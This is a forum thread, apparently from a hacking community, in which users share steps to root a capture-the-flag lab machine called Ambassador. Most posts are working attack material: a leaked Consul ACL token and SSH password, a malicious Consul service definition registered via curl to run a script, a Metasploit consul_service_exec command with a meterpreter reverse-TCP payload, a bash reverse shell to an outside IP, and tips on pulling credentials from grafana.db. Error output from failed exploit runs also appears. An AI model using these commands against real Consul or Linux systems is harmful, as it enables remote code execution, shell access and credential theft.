(October 2, 2022, 12:38 AM)coder1777 Wrote:

(October 2, 2022, 12:18 AM)echo133t Wrote:

consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

¿how did You get the token?

developer@ambassador:/opt/my-app$ git diff c982db8eff6f10f8f3a7d802f79f2705e7a21b55

(October 2, 2022, 12:11 AM)GreyEVO Wrote: Root is with Consul Agent API, you can find a exploit on Github but you have to modify a few stuff
And you need token to interact with the API, which you can find in a .git commit diff somewhere on the machine (cant remember where)

link exploit pls? :D

(October 2, 2022, 12:38 AM)coder1777 Wrote:

(October 2, 2022, 12:18 AM)echo133t Wrote:

consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

¿how did You get the token?

cd /opt/my-app
git show 
letter in red.

For root create a service config file for consul like:exp.json:[code]{ "name": "pwn", "tags": [ "default" ], "checks": [ { "CheckId": "lol", "name": "lol", "args": [ "/tmp/test.sh" ], "interval": "10s", "timeout": "1s" } ]}[/code]Put your payload to /tmp/test.shThen just register the service with your token:[code]curl --header "X-Consul-Token: " --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register[/code]

Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP

password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:

{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}

Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register

Which payload have to put in test.sh can you please explain in simple and brief?

how did you find mysql password?

ambassador writeup 

https://malw0re.gitbook.io/notes/hackthebox/ambassador

ytytyy

(October 2, 2022, 10:12 AM)angadrathee Wrote:

(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:

{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}

Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register

Which payload have to put in test.sh can you please explain in simple and brief?

Payload is a reverse shell. For example:
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1

---

(October 2, 2022, 01:38 PM)Enemigosss2 Wrote: how did you find mysql password?

grafana.db is a useful file, located at /var/lib/grafana/grafana.db
See: https://stackoverflow.com/a/65861668

If you examine it with sqlite3, you will find creds

(October 2, 2022, 02:12 AM)echo133t Wrote: Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP

password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

Why it says
lport => 4444
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*]Exploit completed, but no session was created.

---

(October 2, 2022, 02:12 AM)echo133t Wrote: Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP

password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

Forgot to use change my IP but now it says

[-] Handler failed to bind to 10.10.14.45:9002:-  -
[*] Started reverse TCP handler on 0.0.0.0:9002
[*]Creating service 'YolTTi'
[*]Service 'YolTTi' successfully created.
[*]Waiting for service 'YolTTi' script to trigger
[*]Removing service 'YolTTi'
[*]Command Stager progress - 100.00% done (763/763 bytes)
[*]Exploit completed, but no session was created.
msf6 exploit(multi/misc/consul_service_exec) >